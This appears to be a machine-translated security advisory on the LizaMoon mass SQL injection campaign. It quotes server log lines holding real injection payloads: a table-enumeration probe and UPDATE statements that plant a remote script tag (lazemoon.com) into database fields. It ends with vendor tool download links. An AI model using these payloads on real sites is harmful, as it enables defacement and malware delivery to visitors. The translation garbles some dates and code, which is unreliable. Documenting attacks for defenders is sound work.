websense, a foreign security vendor, recently issued an alarm saying that a SQL Injection hacker attack called Lisa Moon (English name: lizamoon) is sweeping the world. In just a few days, the number of attacked web pages has rapidly increased to 1030000 (as of on January 10, April 2). Foreign media reported that it was "a tsunami outbreak ", even websites of well-known companies such as Apple are listed. At the same time, the number of Chinese webpages affected by Lisa moon has reached 46800 .
-
- Several suspicious IP addresses: 95.64.9.18 (from Romania), 91.217.162.45 (from Ukraine, famous evil Network)
- Valuable iislog provided by netizens (this is a very important clue for intrusion identification)
16:34:45 w3svc1746246233 * myserverip * Get/DIR/linkdetail. aspx id = 11011 + or + 1 = ( Select + TOP + 1 + table_name + from + information_schema.tables + Where + table_name + not + in + (select + TOP + 0 + table_name + from + information_schema.tables) -- 80-91.217.162.45 Mozilla/5.0 + (windows; + U; + windows + nt + 5.0; + en-US; + RV: 1.4) + Gecko/20030624 + Netscape/7.1 + (ax) 500 0 0
Doc. asp? Id = pu000031 + Update + gcategoriashistoricotiposdescripciones + set + descripcion = Replace (cast (descripcion + As + varchar (8000), cast (char (60) % 2 bchar (47) % 2 bchar (116) % 2 bchar (105 ).... omitted. the CHR (NN) character is used to group A character </title> <SCRIPT src = httq: // lazemoon. COM/UR. php> </SCRIPT>... % 2 bchar (116) % 2 bchar (62) + As + varchar (8000), cast (char (32) + As + varchar (8 ))) -- 95.64.9.18 Mozilla/5.0 + (windows; + U; + windows + nt + 5.0; + en-US; + RV: 1.4) + Gecko/20030624 + Netscape/7.1 + (ax)-302 498
17:56:49 <my server IP address> Get/<pagename>. asp prod = mg0011 '+ Update + tblmembers + set + forename = Replace (cast (forename + As + varchar (8000 )), Cast (char (60) % 2 bchar (47) % 2 bchar (116) % 2 bchar (105 ).... omitted. the CHR (NN) character is used to group A character </title> <SCRIPT src = httq: // lazemoon. COM/UR. php> </SCRIPT>... % 2 bchar (116) % 2 bchar (62) + As + varchar (8000), cast (char (32) + As + varchar (8) -- 80- 95.64.9.18 HTTP/1.1 Mozilla/5.0 + (windows; + U; + windows + nt + 5.0; + en-US; + RV: 1.4) + Gecko/20030624 + Netscape/7.1 + (ax)
Solution
1. Download web anti-virus software,AddressHttp://www.safe3.com.cn/works/884981847/view.aspxTo clear the data of the Trojan field in the database.
2. download and install the safe3 web application firewall to protect the website,Address: http://www.safe3.com.cn/works/271360615/view.aspx.
3. Success.
